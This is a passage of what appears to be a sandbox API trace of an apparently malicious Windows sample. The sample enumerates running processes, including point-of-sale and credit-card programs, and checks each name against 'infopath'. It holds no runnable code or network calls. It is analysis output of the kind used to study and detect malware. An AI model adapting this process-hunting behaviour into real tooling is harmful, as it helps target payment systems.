dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.903] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577ea0 [0096.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3577ea0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.903] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0096.903] StrStrIA (lpFirst="whatsapp.exe", lpSrch="infopath") returned 0x0 [0096.903] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0096.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.905] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577ee8 [0096.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3577ee8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0096.905] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0096.905] StrStrIA (lpFirst="winscp.exe", lpSrch="infopath") returned 0x0 [0096.905] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0096.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.906] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575740 [0096.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3575740, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0096.906] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0096.906] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="infopath") returned 0x0 [0096.906] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0096.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.908] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35756e0 [0096.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x35756e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0096.908] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0096.908] StrStrIA (lpFirst="active-charge.exe", lpSrch="infopath") returned 0x0 [0096.908] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0096.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.964] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577eb8 [0096.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3577eb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0096.964] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0096.964] StrStrIA (lpFirst="accupos.exe", lpSrch="infopath") returned 0x0 [0096.964] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0096.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.966] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577f90 [0096.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3577f90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0096.966] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0096.966] StrStrIA (lpFirst="afr38.exe", lpSrch="infopath") returned 0x0 [0096.966] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0096.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.967] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577f00 [0096.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3577f00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0096.967] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0096.967] StrStrIA (lpFirst="aldelo.exe", lpSrch="infopath") returned 0x0 [0096.967] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0096.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0096.968] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3577ed0 [0096.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3577ed0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0096.969] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0096.969] StrStrIA (lpFirst="ccv_server.exe", lpSrch="infopath") returned 0x0 [0096.969] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0096.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0096.970] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3575520 [0096.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3575520, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0096.970] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0096.970] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="infopath") returned 0x0 [0096.970] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0096.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.972] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575720 [0096.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3575720, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0096.972] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0096.972] StrStrIA (lpFirst="creditservice.exe", lpSrch="infopath") returned 0x0 [0096.972] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0096.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.973] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578008 [0096.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3578008, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0096.973] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0096.973] StrStrIA (lpFirst="edcsvr.exe", lpSrch="infopath") returned 0x0 [0096.973] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0096.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.975] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3577f18 [0096.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3577f18, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0096.975] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0096.975] StrStrIA (lpFirst="fpos.exe", lpSrch="infopath") returned 0x0 [0096.975] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0096.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.976] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577f30 [0096.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3577f30, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0096.976] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0096.976] StrStrIA (lpFirst="isspos.exe", lpSrch="infopath") returned 0x0 [0096.976] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0096.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.977] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575560 [0096.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3575560, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0096.977] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0096.978] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="infopath") returned 0x0 [0096.978] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0096.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.979] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577f48 [0096.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3577f48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0096.979] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0096.979] StrStrIA (lpFirst="omnipos.exe", lpSrch="infopath") returned 0x0 [0096.979] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0096.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.980] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577f60 [0096.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3577f60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0096.980] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0096.980] StrStrIA (lpFirst="spcwin.exe", lpSrch="infopath") returned 0x0 [0096.980] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0096.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.982] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3575640 [0096.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3575640, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0096.982] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0096.982] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="infopath") returned 0x0 [0096.982] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0096.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.983] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3577f78 [0096.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3577f78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0096.983] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0096.983] StrStrIA (lpFirst="utg2.exe", lpSrch="infopath") returned 0x0 [0096.983] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0096.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.984] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577fa8 [0096.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3577fa8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0096.984] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0096.984] StrStrIA (lpFirst="saying.exe", lpSrch="infopath") returned 0x0 [0096.984] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0096.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.986] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3577fc0 [0096.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3577fc0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0096.986] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0096.986] StrStrIA (lpFirst="ripe.exe", lpSrch="infopath") returned 0x0 [0096.986] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0096.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.995] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577fd8 [0096.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3577fd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0096.995] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0096.995] StrStrIA (lpFirst="acoustic.exe", lpSrch="infopath") returned 0x0 [0096.996] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0096.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.997] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3578020 [0096.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3578020, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0096.997] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0096.997] StrStrIA (lpFirst="mail.exe", lpSrch="infopath") returned 0x0 [0096.997] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.998] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578038 [0096.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3578038, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0096.998] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0096.998] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="infopath") returned 0x0 [0096.998] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, 